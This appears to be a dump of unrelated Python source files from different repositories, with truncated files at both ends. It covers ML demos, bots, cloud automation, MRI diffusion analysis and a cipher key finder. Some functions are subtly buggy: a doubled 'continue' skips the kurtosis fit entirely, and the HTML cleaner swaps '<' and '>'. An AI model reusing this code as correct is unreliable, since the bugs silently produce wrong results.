# unittest.main(*sys.argv[1:])
# ______________________________________________________________________
# End of test_filter2d.py
| 1,721 |
examples/classify.py
|
butyess/retrodiff
| 0 |
2023131
|
import math
import logging
from functools import reduce
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_moons
from retrodiff.utils import GradientDescent, SVMBinaryLoss, NN
def plot(model, inputs, labels):
h = 0.25
x_min, x_max = inputs[:, 0].min() - 1, inputs[:, 0].max() + 1
y_min, y_max = inputs[:, 1].min() - 1, inputs[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
input_mesh = np.c_[np.ravel(xx), np.ravel(yy)]
scores = model.evaluate(input_mesh)
Z = np.argmax(scores, axis=-1).reshape(xx.shape)
fig, ax = plt.subplots()
ax.contourf(xx, yy, Z, alpha=0.8, cmap=plt.cm.Spectral)
ax.scatter(inputs[:, 0], inputs[:, 1], c=labels, cmap=plt.cm.Spectral)
plt.show()
def main():
model = NN([2, 16, 16, 2])
model.set_loss(SVMBinaryLoss())
model.set_optim(GradientDescent(lr=0.001))
inputs, labels = make_moons(n_samples=100, shuffle=True, noise=0.1)
x_train = [x.reshape(1, -1) for x in inputs]
y_train = [y.reshape(1, -1) for y in labels]
x_test, y_test = make_moons(n_samples=100, shuffle=True, noise=0.1)
x_test = [x.reshape(1, -1) for x in x_test]
y_test = [y.reshape(1, -1) for y in y_test]
for e in range(10):
model.train(10, x_train, y_train)
print('epoch ', e, 'avg test loss: ', model.test(x_test, y_test))
plot(model, inputs, labels)
if __name__ == "__main__":
main()
| 1,509 |
pulumi/__main__.py
|
sio/gitlab-runners-fleet
| 0 |
2023587
|
'''Auto scaling fleet of GitLab CI runners'''
import os
import pulumi
from itertools import chain
import scaling
from destroy import cleanup
from instance import create, create_key
pulumi.log.debug('Create SSH key in cloud account')
key = create_key()
pulumi.log.debug('Calculate actions for existing instances')
actions = scaling.calculate_actions()
pulumi.log.debug('Execute cleanup actions on machines scheduled for deletion')
for status, instances in actions['DELETE'].items():
for instance in instances:
pulumi.log.info(f'Deleting instance {instance.name}: {status}')
try:
cleanup(instance, identity_file=os.environ['GITLAB_RUNNER_SSHKEY'])
except Exception:
pass
pulumi.log.debug('Create servers')
export = []
for status, instances in chain(actions['KEEP'].items(), actions['CREATE'].items()):
for instance in instances:
pulumi.log.debug(f'Create server: {instance.name}')
server = create(instance, depends_on=[key,])
export.append(dict(
name=instance.name,
cleanup=instance.cleanup or [
'sudo', '-u', 'gitlab-runner', '/etc/gitlab-runner-custom/unregister.sh'
],
ssh=server.ipv4_address.apply(lambda ip: f'op@{ip}'),
metrics=server.ipv4_address.apply(lambda ip: f'http://{ip}:8080/metrics'),
created_at=instance.created_at,
idle_since=instance.idle_since,
))
pulumi.log.debug('Export infrastructure snapshot')
pulumi.export(
os.environ['PULUMI_SNAPSHOT_OBJECT'],
sorted(
export,
key=lambda i: (i['created_at'], i['name']),
)
)
| 1,662 |
Genetic-algorithm-code-breaker.py
|
trik-flip/Genetic-algorithm-code-breaker
| 0 |
2022982
|
from BruteForce import Brute, Force
from Cryptic import decrypt, encrypt, key_generator
from Evo import Generation
PASSWORD_LENGTH = 2
POSSIBLE = [chr(65+x) for x in range(26)] # creats a list with "A" till "Z"
# Text originates from Wikipedia
# Text has a maximum fitness of 441 points
plain_text = """Biologie is de natuurwetenschap die zich richt op levende organismen, levensprocessen en levensverschijnselen. De biologie omvat een breed scala aan vakgebieden waarin men onderzoek doet naar fysieke structuur, chemische processen, moleculaire interacties, fysiologische mechanismen, ecologische samenhang, ontwikkeling en evolutie. Biologie erkent de cel als de fysieke basiseenheid van het leven, genen als de basiseenheid van erfelijke informatie en evolutie als het mechanisme achter het ontstaan en het uitsterven van soorten. Levende organismen zijn open systemen die in staat zijn te overleven door bruikbare omzettingen van energie en door handhaving van hun vitale toestand.
Moderne biologie is overwegend een exacte natuurwetenschap, waardoor experimentele, kwantitatieve benaderingen en causale verklaringen centraal staan. Per vakgebied worden echter verschillende onderzoeksmethoden gehanteerd: wiskundige of theoretische biologie omvat de filosofie van de biologie en gebruikt wiskundige methoden om kwantitatieve modellen te formuleren. Experimentele biologie omvat omvat beschrijvend onderzoek en empirische benaderingen, waarin de geldigheid van voorgestelde theorieën wordt getest. Veel principes uit de biologie zijn gebaseerd op de toepassing van scheikundige en natuurkundige wetten op levende systemen.""" # noqa: disable pylama warning
text = "".join(plain_text.upper().split(" "))
# Create key, and encrypted text
key = key_generator(PASSWORD_LENGTH, POSSIBLE)
print(f"The Key is:{key}")
encrypted_text = encrypt(key, text)
# Start of program
my_choise = input(
"Whould you like to use \"{}\", \"{}\" or \"{}\"?".format(
"genetic algorithm[g]",
"brute force[b]",
"stop[S]"
))
if my_choise.upper() in ["G", "B"]:
if my_choise.upper() == "G":
# Using the genetic algorithm
gen = Generation(100, POSSIBLE, encrypted_text)
found_key = gen.start(PASSWORD_LENGTH)
else:
# Using the bruteforce method
brute = Brute(POSSIBLE, PASSWORD_LENGTH)
force = Force(brute)
found_key = force.start(encrypted_text)
# print the key
print(
"I think it's :{}\nKey:{}".format(
decrypt(found_key, encrypted_text), found_key))
| 2,561 |
src/jama/tools/clean_html.py
|
yejingyu/jama-slack-integration
| 1 |
2023666
|
# from bs4 import BeautifulSoup
import re
def remove_tags(html):
"""
Function will clean html by removing html tags leaving behind plaintext.
Args:
html (string): The html to be cleaned
Returns:
(string): The plaintext
"""
# return BeautifulSoup(html, "lxml").text
html = re.sub("<[^<]+?>", "", html)
html = re.sub(" ", " ", html)
html = re.sub(""", "\"", html)
html = re.sub("'", "'", html)
html = re.sub(">", "<", html)
return re.sub("<", ">", html)
| 538 |
tests/unit/conftest.py
|
brendanhasz/probflow-v2
| 2 |
2023437
|
"""Fixtures for unit tests."""
import pytest
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
import probflow as pf
# TODO: fixtures if you need them
"""
@pytest.fixture(scope="session")
def LR1_novar_unfit():
weight = Parameter(name='thing1')
bias = Parameter(name='thing2')
data = Input()
model = Normal(data*weight + bias, 1.0)
return model
"""
| 448 |
werewolf/models/user.py
|
LucienZhang/werewolf-back
| 0 |
2022844
|
from sqlalchemy import Column, Integer, String, Boolean
from .base import Base
class User(Base):
uid = Column(Integer, primary_key=True, autoincrement=True)
username = Column(String(length=255),
nullable=False, unique=True, index=True)
hashed_password = Column(String(length=255), nullable=False)
# login_token = Column(String(length=255), nullable=False, index=True)
nickname = Column(String(length=255), nullable=False)
avatar = Column(Integer, nullable=False)
gid = Column(Integer, nullable=False) # gid=-1 means not in game
is_active = Column(Boolean, nullable=False, default=True)
is_superuser = Column(Boolean, nullable=False, default=False)
| 726 |
airflow/contrib/operators/dataflow_operator.py
|
harrisjoseph/incubator-airflow
| 4 |
2023094
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from airflow.contrib.hooks.gcp_dataflow_hook import DataFlowHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataFlowJavaOperator(BaseOperator):
"""
Start a Java Cloud DataFlow batch job. The parameters of the operation
will be passed to the job.
It's a good practice to define dataflow_* parameters in the default_args of the dag
like the project, zone and staging location.
```
default_args = {
'dataflow_default_options': {
'project': 'my-gcp-project',
'zone': 'europe-west1-d',
'stagingLocation': 'gs://my-staging-bucket/staging/'
}
}
```
You need to pass the path to your dataflow as a file reference with the ``jar``
parameter, the jar needs to be a self executing jar. Use ``options`` to pass on
options to your job.
```
t1 = DataFlowOperation(
task_id='datapflow_example',
jar='{{var.value.gcp_dataflow_base}}pipeline/build/libs/pipeline-example-1.0.jar',
options={
'autoscalingAlgorithm': 'BASIC',
'maxNumWorkers': '50',
'start': '{{ds}}',
'partitionType': 'DAY'
},
dag=my-dag)
```
Both ``jar`` and ``options`` are templated so you can use variables in them.
"""
template_fields = ['options', 'jar']
ui_color = '#0273d4'
@apply_defaults
def __init__(
self,
jar,
dataflow_default_options=None,
options=None,
gcp_conn_id='google_cloud_default',
delegate_to=None,
*args,
**kwargs):
"""
Create a new DataFlowJavaOperator.
For more detail on about job submission have a look at the reference:
https://cloud.google.com/dataflow/pipelines/specifying-exec-params
:param jar: The reference to a self executing DataFlow jar.
:type jar: string
:param dataflow_default_options: Map of default job options.
:type dataflow_default_options: dict
:param options: Map of job specific options.
:type options: dict
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:type gcp_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
"""
super(DataFlowJavaOperator, self).__init__(*args, **kwargs)
dataflow_default_options = dataflow_default_options or {}
options = options or {}
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.jar = jar
self.dataflow_default_options = dataflow_default_options
self.options = options
def execute(self, context):
hook = DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to)
dataflow_options = copy.copy(self.dataflow_default_options)
dataflow_options.update(self.options)
hook.start_java_dataflow(self.task_id, dataflow_options, self.jar)
| 3,784 |
Bot/fb_bot.py
|
FaHoLo/Pizza_delivery
| 0 |
2022941
|
import os
from dotenv import load_dotenv
from flask import Flask, request
import requests
import db_aps
import fb_cache
import fb_templates
import moltin_aps
app = Flask(__name__)
load_dotenv()
FACEBOOK_TOKEN = os.environ['PAGE_ACCESS_TOKEN']
DB = db_aps.get_database_connection()
@app.route('/', methods=['GET'])
def verify():
'''
При верификации вебхука у Facebook он отправит запрос на этот адрес. На него нужно ответить VERIFY_TOKEN.
'''
if request.args.get('hub.mode') == 'subscribe' and request.args.get('hub.challenge'):
if not request.args.get('hub.verify_token') == os.environ['VERIFY_TOKEN']:
return 'Verification token mismatch', 403
return request.args['hub.challenge'], 200
return 'Hello world', 200
@app.route('/', methods=['POST'])
def webhook():
'''
Основной вебхук, на который будут приходить сообщения от Facebook и Moltin.
'''
if request.headers['User-Agent'] == 'moltin/integrations':
# webhook on moltin products and categories create/update/delete events
# TODO handle updates and choose cache action
if request.headers['X-Moltin-Secret-Key'] != os.environ['VERIFY_TOKEN']:
return 'Verification token mismatch', 403
fb_cache.update_cached_cards()
return 'ok', 200
data = request.get_json()
for entry in data['entry']:
for messaging_event in entry['messaging']:
postback = None
sender_id = messaging_event['sender']['id']
if messaging_event.get('message'):
message_text = messaging_event['message']['text']
if messaging_event.get('postback'):
message_text = messaging_event['postback']['title']
postback = messaging_event['postback']['payload']
handle_users_reply(sender_id, message_text, postback)
return 'ok', 200
def handle_users_reply(sender_id, message_text, postback=None):
states_functions = {
'START': handle_start,
'MENU': handle_menu,
'CART': handle_cart,
}
recorded_state = DB.get(f'fb-{sender_id}')
if not recorded_state or recorded_state.decode('utf-8') not in states_functions.keys():
user_state = 'START'
else:
user_state = recorded_state.decode('utf-8')
if message_text == '/start':
user_state = 'START'
state_handler = states_functions[user_state]
next_state = state_handler(sender_id, message_text, postback)
DB.set(f'fb-{sender_id}', next_state)
def handle_start(recipient_id, message_text, postback):
send_menu(recipient_id)
return 'MENU'
def send_menu(recipient_id, category_id=None):
message_payload = fb_templates.collect_menu_message(recipient_id, category_id)
send_message(recipient_id, message_payload)
def send_message(recipient_id, message_payload):
params = {'access_token': FACEBOOK_TOKEN}
headers = {'Content-Type': 'application/json'}
request_content = {
'recipient': {
'id': recipient_id
},
'message': message_payload,
}
response = requests.post(
'https://graph.facebook.com/v7.0/me/messages',
params=params, headers=headers, json=request_content
)
response.raise_for_status()
def handle_menu(recipient_id, message_text, postback):
if postback in [category['id'] for category in moltin_aps.get_all_categories()]:
send_menu(recipient_id, postback)
elif message_text == 'Добавить в корзину':
add_pizza_to_cart(recipient_id, postback)
elif message_text == 'Корзина':
message = fb_templates.collect_cart_message(postback)
send_message(recipient_id, message)
return 'CART'
else:
send_menu(recipient_id)
return 'MENU'
def add_pizza_to_cart(recipient_id, product_id):
quantity = 1
moltin_aps.add_product_to_cart(f'fb-{recipient_id}', product_id, quantity)
pizza_name = moltin_aps.get_product_info(product_id)['name']
message = {'text': f'В корзину добавлена пицца «{pizza_name}»'}
send_message(recipient_id, message)
def handle_cart(recipient_id, message_text, postback):
if 'add' in postback:
pizza_id = postback.split(':')[-1]
add_pizza_to_cart(recipient_id, pizza_id)
elif 'remove' in postback:
item_id = postback.split(':')[-1]
moltin_aps.remove_item_from_cart(f'fb-{recipient_id}', item_id)
message = {'text': 'Пицца удалена из корзины'}
send_message(recipient_id, message)
else:
send_menu(recipient_id)
return 'MENU'
message = fb_templates.collect_cart_message(f'fb-{recipient_id}')
send_message(recipient_id, message)
return 'CART'
def check_db_for_cards():
keys = DB.keys()
if b'categories_card' not in keys:
fb_cache.update_cached_cards()
if __name__ == '__main__':
check_db_for_cards()
debug = os.getenv("DEBUG", "false").lower() in ['yes', '1', 'true']
app.run(debug=debug)
| 4,990 |
MuteAll/bot.py
|
zahid47/MuteAll-DiscordBot-Among-Us
| 10 |
2022847
|
import discord
import os
from MuteAll import events, utils, core
bot = discord.AutoShardedBot()
# sets status when the bot is ready
@bot.event
async def on_ready():
await events.on_ready(bot)
@bot.slash_command(name="ping", description="show latency of the bot")
async def ping(ctx: discord.ApplicationContext):
await ctx.respond(f"Pong! {round(bot.latency * 1000)} ms")
@bot.slash_command(name="help", description="get some help!")
async def help(ctx: discord.ApplicationContext):
await utils.help(ctx)
@bot.slash_command(name="mute", description="server mute people!")
async def mute(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="mute", members=members)
await ctx.respond("👍")
@bot.slash_command(name="unmute", description="unmute people!")
async def unmute(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="unmute", members=members)
await ctx.respond("👍")
@bot.slash_command(name="deafen", description="deafen people!")
async def deafen(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="deafen", members=members)
await ctx.respond("👍")
@bot.slash_command(name="undeafen", description="undeafen people!")
async def undeafen(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="undeafen", members=members)
await ctx.respond("👍")
@bot.slash_command(name="all", description="mute and deafen people!")
async def all(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="all", members=members)
await ctx.respond("👍")
@bot.slash_command(name="unall", description="unmute and undeafen people!")
async def unall(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="unall", members=members)
await ctx.respond("👍")
@bot.slash_command(name="stats", description="show stats")
async def stats(ctx: discord.ApplicationContext):
await utils.stats(ctx, bot)
# DEPRECATED
# # respond a help msg when the bot joins a server
# @bot.event
# async def on_guild_join(guild):
# await events.on_guild_join(guild)
# @bot.command()
# async def changeprefix(ctx, prefix):
# await prefixes.changeprefix(ctx, prefix)
# @bot.command(aliases=["prefix"])
# async def viewprefix(ctx):
# await prefixes.viewprefix(ctx)
# @bot.command(aliases=["e", "E", "End"])
# async def end(ctx, *args):
# if len(args) == 0:
# members = ctx.author.voice.channel.members
# else:
# members = await utils.get_affected_users(ctx, args)
# await core.do(ctx, task="end", members=members)
# @bot.command(aliases=["udme", "Undeafenme"])
# async def undeafenme(ctx):
# await core.do(ctx, task="undeafen", members=[ctx.author])
# DEPRECATED
# run the bot
def run():
bot.run(os.getenv("DISCORD_TOKEN"))
| 4,407 |
PyDWI/core.py
|
gkaissis/PyDWI
| 4 |
2023507
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['show', 'ADC', 'kurtosis', 'SliceGroup', 'DWIDataset', 'get_ADC_map', 'get_DK_map', 'get_ADC_dataset',
'get_DKI_dataset', 'save_nii']
# Cell
import pydicom
import numpy as np
import nibabel as nib
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from functools import partial
show = partial(plt.imshow, cmap="gray")
import pandas as pd
from tqdm import tqdm
from joblib import Parallel, delayed
from sklearn.linear_model import LinearRegression
import warnings
# Cell
def ADC(pixel, ADC, intercept):
return ADC*pixel + intercept
# Cell
def kurtosis(x, D, K):
return (-x * D) + ((x **2)* (D **2) * K/6)
# Cell
class SliceGroup():
'''Represents a logical group of slices. Should never be called directly.
'''
def __init__(self, df):
self.df = df
@property
def pixel_array(self):
return np.stack(self.df["pixels"])
def __len__(self):
return self.pixel_array.shape[0]
def __repr__(self):
return f"""SliceGroup at position {self.df["z_position"].unique()} with instance numbers {self.df["instance_no"].unique()},
b_values {self.df["b_value"].unique()} and {len(self)} slices."""
def show(self, figsize=(20,5)):
fig, ax = plt.subplots(ncols=len(self), figsize=figsize)
for i, axi, in enumerate(ax.flat):
fig.suptitle(f"""Slice position {self.df["z_position"].unique()}""")
ax[i].imshow(self.pixel_array[i], cmap="gray")
ax[i].set_title(f"""b {self.df["b_value"].unique()[i]}, instance_no {self.df["instance_no"].unique()[i]}""")
# Cell
class DWIDataset():
'''Represents a DWI dataset from a multiframe DICOM. On loading, the dataset is rescaled and
broken up into SliceGroups which represent one slice acquired with different b-values.
Get information about the Dataset by calling .info.
'''
def __init__(self, filepath):
self.filepath = filepath
self.dataset = pydicom.dcmread(filepath)
print("Loading and rescaling...")
self.pixel_array = self.dataset.pixel_array *self.rescale_slope + self.rescale_intercept
self.df = self._get_logical_groups()
print("Successfully loaded Dataset")
@property
def rescale_slope(self):
rs = set([float(self.dataset.PerFrameFunctionalGroupsSequence[i].PixelValueTransformationSequence[0].RescaleSlope)
for i in range(len(self))])
if not len(rs) == 1:
raise ValueError("More than one rescale slope detected. Processing failed.")
return rs.pop()
@property
def rescale_intercept(self):
rs = set([float(self.dataset.PerFrameFunctionalGroupsSequence[i].PixelValueTransformationSequence[0].RescaleIntercept)
for i in range(len(self))])
if not len(rs) == 1:
raise ValueError("More than one rescale intercept detected. Processing failed.")
return rs.pop()
def __len__(self):
return int(self.dataset.NumberOfFrames.real)
def _get_logical_groups(self):
d = dict()
func_grps = [self.dataset.PerFrameFunctionalGroupsSequence[i] for i in range(len(self))]
instance_nums = [int(grp["2005", "140f"][0]["InstanceNumber"].value) for grp in func_grps]
z_positions = [(round(grp["0020", "9113"][0]["ImagePositionPatient"].value[-1], 2)) for grp in func_grps]
b_values = [(int(grp.MRDiffusionSequence[0].DiffusionBValue)) for grp in func_grps]
pixs = [ar for ar in self.pixel_array]
return pd.DataFrame([z_positions, instance_nums, b_values, pixs], index=["z_position", "instance_no", "b_value","pixels"]).T
@property
def slice_groups(self):
'''Contains the logical slice groups of same
position slices acquired at different b values.
'''
grps = []
for position in np.unique(self.df["z_position"]):
grps.append(SliceGroup(self.df[self.df["z_position"]==position]))
return grps
@property
def info(self):
return f'''DICOMDataset with {len(self.pixel_array)} slices in groups of {len(self.df["b_value"].unique())} slices each
rescaled with slope {self.rescale_slope:.4f} and intercept {self.rescale_intercept:.4f}.'''
def __repr__(self):
return self.info
# Cell
def get_ADC_map(dataset, bvals="full", diagnostics=False, n_jobs=1):
'''Fast ADC map calculation from a given dataset.
b_vals="full" uses all b-values, "reduced" uses up to b600.
diagnostics=True returns the R-squared value.
n_jobs determines how many processes to use. -1 is all available.
'''
lr = LinearRegression(n_jobs=n_jobs)
denominator = dataset[1,...] #b50
if bvals=="full":
numerator = dataset[1:,...]
x = np.array([50,300,600,1000]).reshape(-1,1)
elif bvals=="reduced":
numerator = dataset[1:4,...] #b50-600
x = np.array([50,300,600]).reshape(-1,1)
else: raise ValueError("""Supported options are 'full' or 'reduced'""")
ar = np.nan_to_num(np.log(numerator/denominator), nan=0, posinf=0, neginf=0
).reshape(numerator.shape[0], numerator.shape[1]*numerator.shape[2])
result = (lr.fit(x, ar).coef_).squeeze() * (-1e3)
score = lr.score(x, ar)
if diagnostics:
return result.reshape(dataset.shape[1], dataset.shape[2]), score
return result.reshape(dataset.shape[1], dataset.shape[2])
# Cell
def get_DK_map(dataset, p0=None, bounds=((1e-5, 1e-2), (4e-3, 2))):
'''Produces a D and a K-map using b-values 50,300, 600 and 1000.
p0 and bounds are passed to curve_fit
'''
denominator = dataset[1,...] #b50
numerator = dataset[1:,...] #b50-1000
ar = np.nan_to_num(np.log(numerator/denominator), nan=0, posinf=0, neginf=0)
D_map = np.zeros(shape=(ar.shape[1], ar.shape[2]))
K_map = np.ones(shape=(ar.shape[1], ar.shape[2]))
x = [50,300,600,1000]
for xx in range(ar.shape[1]):
for yy in range(ar.shape[2]):
if ar[:, xx, yy].sum() == 0 or np.all(ar[:,xx,yy] == ar[0,xx,yy]):
continue
continue
try:
result = curve_fit(kurtosis, x, ar[:, xx, yy], p0=p0, bounds=bounds)[0]
except:
result = (0, 0)
D_map[xx, yy] = result[0]*1e3
K_map[xx, yy] = result[1]
return (D_map, K_map)
# Cell
def get_ADC_dataset(dwi_dataset, n_jobs=-1, bvals="full", diagnostics=False, suppress_warnings=True):
if suppress_warnings:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
adc = np.array([get_ADC_map(slice_group.pixel_array, n_jobs=n_jobs,
bvals=bvals, diagnostics=diagnostics)
for slice_group in dwi_dataset.slice_groups])
else:
adc = np.array([get_ADC_map(slice_group.pixel_array, n_jobs=n_jobs,
bvals=bvals, diagnostics=diagnostics)
for slice_group in dwi_dataset.slice_groups])
return adc
# Cell
def get_DKI_dataset(dwi_dataset, n_jobs=-1, verbose=1):
DKI_maps = Parallel(n_jobs=n_jobs, verbose=verbose)(delayed(get_DK_map)(slice_group.pixel_array)
for slice_group in dwi_dataset.slice_groups)
DMaps = np.array(DKI_maps)[:,0,...]
KMaps = np.array(DKI_maps)[:,1,...]
return DMaps, KMaps
# Cell
def save_nii(ar, filename):
nib.save(nib.Nifti1Image(np.fliplr(np.rot90(np.transpose(ar[::-1], (1,2,0)))), np.eye(4)), f"{filename}.nii.gz")
| 7,732 |
backend/lookup/admin.py
|
AISVisioner/cameraDetector
| 0 |
2023416
|
from django.contrib import admin
from .models import Visitor
@admin.register(Visitor)
class UserAdmin(admin.ModelAdmin):
date_hierarchy = 'created_at'
readonly_fields = ('recent_access_at','created_at',)
| 212 |
cogs/help.py
|
ConchDev/Example-Leveling-System
| 1 |
2022754
|
import discord
from discord.ext import commands
cmds = {
"rank" : {
"title": "Rank command",
"desc": "Shows a member's rank",
"aliases": "None",
"usage": "```rank [member]```",
"cooldown" : "`5`s"
},
"leaderboard" : {
"title": "Leaderboard command",
"desc": "Shows the top 10 in the leaderboard. **True** is **global** and **False** is **guild only**",
"aliases": "None",
"usage": "```leaderboard [true/false]```",
"cooldown" : "`5`s"
},
"set" : {
"title": "set command",
"desc": "To set a user's xp/level",
"aliases": "None",
"usage" : "```set [level/xp] [member] [amount]```",
"cooldown" : "None"
},
"restart" : {
"title": "Restart command",
"desc": "Restart the Bot",
"aliases": "None",
"usage" : "```restart```",
"cooldown" : "None"
},
"shutdown" : {
"title": "Shutdown command",
"desc": "Shutdowns the bot",
"aliases": "close",
"usage" : "```shutdown```",
"cooldown" : "None"
},
"refresh" : {
"title": "Refresh command",
"desc": "Refresh the current code with the code on github",
"aliases": "pull",
"usage" : "```refresh```",
"cooldown" : "None"
},
"load" : {
"title": "Load command",
"desc": "Load a module",
"aliases": "None",
"usage" : "```load [module name]```",
"cooldown" : "None"
},
"unload" : {
"title": "Unload command",
"desc": "Unload a module",
"aliases": "None",
"usage" : "```unload [cog name]```",
"cooldown" : "None"
},
"reload" : {
"title": "Reload command",
"desc": "Reload a module",
"aliases": "None",
"usage" : "```reload [module name]```",
"cooldown" : "None"
},
"uptime" : {
"title": "Uptime command",
"desc": "See Bot's Uptime",
"aliases": "None",
"usage" : "```uptime```",
"cooldown" : "`5`s"
},
"source" : {
"title": "Source command",
"desc": "Get the bot source code",
"aliases": "github/code",
"usage" : "```uptime```",
"cooldown" : "`5`s"
},
"stats" : {
"title": "Stats command",
"desc": "See bot's stats",
"aliases": "statistics",
"usage" : "```stats```",
"cooldown" : "`5`s"
},
"eval" : {
"title": "Eval command",
"desc": "Evaluate code (command stays hidden from help command)",
"aliases": "None",
"usage" : "```stats```",
"cooldown" : "None"
},
"image" : {
"title": "Image command",
"desc": "Change background for rank command",
"aliases": "None",
"usage" : "```image [url]```",
"cooldown" : "`5`s"
}
}
class helpcommand(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def help(self, ctx, *, command=None):
if command is None:
embed = discord.Embed(title="Help", description="Commands", color=discord.Color.red())
embed.add_field(name="Level", value="Shows a member's rank")
embed.add_field(name="Leaderboard", value="Shows the top 10 in the leaderboard. **True** is **global** and **False** is **guild only**")
embed.add_field(name="Set", value="Sets a user's xp or level")
embed.add_field(name="Usage:", value="```\nrank [member]```")
embed.add_field(name="Usage:", value="```\nleaderboard [true/false]```")
embed.add_field(name="Usage:", value="```\nset [level/xp] [member] [amount]```")
embed.add_field(name="Image", value="Change background for rank command")
embed.add_field(name="Restart", value="Restart the Bot")
embed.add_field(name="Refresh", value="Refresh the current code with the code on github")
embed.add_field(name="Usage:", value="```\nrestart```")
embed.add_field(name="Usage:", value="```\nimage [url]```")
embed.add_field(name="Usage:", value="```\nrefresh```")
embed.add_field(name="Load", value="Load a module")
embed.add_field(name="Unload", value="Unload a module")
embed.add_field(name="Reload", value="Reload a module")
embed.add_field(name="Usage:", value="```\nload [module name]```")
embed.add_field(name="Usage:", value="```\nunload [module name]```")
embed.add_field(name="Usage:", value="```\nreload [module name]```")
embed.add_field(name="Uptime", value="See Bot's Uptime")
embed.add_field(name="Source", value="Get the bot source code")
embed.add_field(name="Stats", value="See bot's stats")
embed.add_field(name="Usage:", value="```\nuptime```")
embed.add_field(name="Usage:", value="```\nsource [command name]```")
embed.add_field(name="Usage:", value="```\nstats```")
embed.set_thumbnail(url=self.bot.user.avatar_url)
embed.set_footer(text=f"Requested by {ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
await ctx.send(embed=embed)
else:
try:
command = command.lower()
embed = discord.Embed(title=cmds[command].get("title"))
embed.add_field(name="Description:", value=cmds[command].get("desc"), inline=False)
embed.add_field(name="Aliases:", value=cmds[command].get("aliases"), inline=False)
embed.add_field(name="Cooldown:", value=cmds[command].get("cooldown"), inline=False)
embed.add_field(name="Usage:", value=cmds[command].get("usage"), inline=False)
embed.set_footer(text=f"Requested by {ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
await ctx.send(embed=embed)
except:
await ctx.send("Command not found")
def setup(bot):
bot.add_cog(helpcommand(bot))
| 6,175 |
simulate_keyboard.py
|
xk19yahoo/SimulateKeyboard
| 0 |
2023538
|
#coding=cp936
import win32gui,win32api,win32con
import time
import threading
def key():
interval = 0.3
while True:
time.sleep(interval )
win32api.keybd_event(65,0,0,0) #a键位码是86
win32api.keybd_event(65,0,win32con.KEYEVENTF_KEYUP,0)
t = threading.Thread(target=key)
t.start()
| 310 |
tensor2struct/models/overnight/overnight_beam_search.py
|
chenyangh/tensor2struct-public
| 69 |
2022881
|
import attr
import copy
import operator
import torch
import torch.nn.functional as F
from tensor2struct.datasets import overnight
from tensor2struct.utils import registry
import tensor2struct.languages.dsl.common.errors as lf_errors
import tensor2struct.languages.dsl.common.util as lf_util
@attr.s
class Hypothesis:
inference_state = attr.ib()
next_choices = attr.ib()
score = attr.ib(default=0)
choice_history = attr.ib(factory=list)
score_history = attr.ib(factory=list)
@attr.s
class Candidate:
hyp = attr.ib()
choice = attr.ib()
choice_score = attr.ib()
cum_score = attr.ib()
@registry.register("infer_method", "overnight_beam_search")
def overnight_beam_search(model, orig_item, preproc_item, beam_size, max_steps):
"""
Beam search and finally filtered with execution
"""
orig_beam_size = beam_size
beam_size = beam_size * 2
ret_state = model(orig_item, preproc_item, compute_loss=False, infer=True)
inference_state, next_choices = (
ret_state["initial_state"],
ret_state["initial_choices"],
)
beam = [Hypothesis(inference_state, next_choices)]
finished = []
for step in range(max_steps):
if len(finished) == beam_size:
break
candidates = []
for hyp in beam:
candidates += [
Candidate(
hyp, choice, choice_score.item(), hyp.score + choice_score.item()
)
for choice, choice_score in hyp.next_choices
]
# Keep the top K expansions
candidates.sort(key=operator.attrgetter("cum_score"), reverse=True)
candidates = candidates[: beam_size - len(finished)]
# Create the new hypotheses from the expansions
beam = []
for candidate in candidates:
inference_state = candidate.hyp.inference_state.clone()
next_choices = inference_state.step(candidate.choice)
